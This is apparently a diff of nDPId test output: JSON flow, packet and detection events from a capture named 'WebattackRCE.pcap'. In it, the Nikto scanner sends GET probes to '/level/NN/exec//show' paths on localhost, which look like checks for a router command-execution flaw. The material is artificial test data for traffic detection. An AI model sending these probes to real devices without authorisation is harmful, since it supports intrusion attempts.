{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 